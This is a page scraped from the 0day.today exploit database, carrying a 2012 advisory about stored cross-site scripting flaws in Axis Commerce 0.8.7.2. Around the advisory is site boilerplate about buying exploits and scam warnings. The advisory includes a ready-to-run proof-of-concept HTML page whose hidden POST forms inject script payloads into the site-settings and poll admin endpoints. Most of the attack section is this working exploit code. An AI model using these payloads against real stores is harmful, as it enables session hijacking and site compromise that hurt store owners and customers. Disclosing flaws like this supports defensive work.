0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Axis Commerce 0.8.7.2 Cross Site Scripting Vulnerability
<!-- Axis Commerce 0.8.7.2 Remote Script Insertion Vulnerabilities Vendor: Axis Product web page: http://www.axiscommerce.com Affected version: 0.8.7.2 Summary: Powerful open source ecommerce platform. Desc: Axis Commerce suffers from multiple stored XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Microsoft Windows 7 Ultimate SP1 (EN) Apache 2.4.2 (Win32) PHP 5.4.4 MySQL 5.5.25a Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2012-5115 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5115.php https://github.com/axis/axiscommerce/issues/233 27.11.2012 --> <html> <head> <title>Axis Commerce 0.8.7.2 Remote Script Insertion Vulnerabilities</title> </head> <body><center><br /> <form method="POST" action="http://localhost/axis/admin/core/site/batch-save"> <input type="hidden" name="data" value='{"2":{"id":"2", "name":"\"><script>alert('XSS');</script>", "base":"TEST_STRING", "secure":"TEST_STRING2", "root_category":"2"}}' /> <input type="submit" value="Go Site" /> </form><br /> <form method="POST" action="http://localhost/axis/admin/poll/save"> <input type="hidden" name="answer[-1][1]" value='"><script>alert(1);</script>' /> <input type="hidden" name="description[1]" value='"><script>alert(2);</script>' /> <input type="hidden" name="id" value="" /> <input type="hidden" name="sites" value="1" /> <input type="hidden" name="status" value="1" /> <input type="hidden" name="type" value="0" /> <input type="submit" value="Go Poll" /> </form> </center></body> </html> # 0day.today [2024-11-16] #